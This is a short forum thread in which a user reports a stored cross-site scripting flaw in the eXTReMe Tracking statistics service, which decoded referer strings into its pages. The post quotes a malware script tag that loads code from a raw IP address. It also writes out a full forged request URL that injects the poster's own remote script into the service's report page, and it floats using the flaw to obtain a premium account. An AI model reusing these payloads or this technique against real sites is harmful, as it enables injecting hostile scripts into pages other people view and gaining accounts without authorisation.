I use this one to track visitors coming to my blog.
Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:

<script src=http://121.15.220.104/1.js></script>

which is the signature for the virus.

Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:
http://www.flickr.com/photos/22823442@N02/2195246062/
What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page.

Now let's see if I can "forge" the referer to insert my own script to the page

Haha. The ad writes "好消息", aka "good news"

P.S. Forum is not asian-languages compatible.

I finally managed to reproduce the XSS in a "nice" way
First you need to request the page:
http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search
Then wait for a few minutes and you'll see the xss here: http://extremetracking.com/open;ref1?login=qpenguin
Screenshot:
http://www.flickr.com/photos/22823442@N02/2194552167/

Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one

jup that's pretty bad.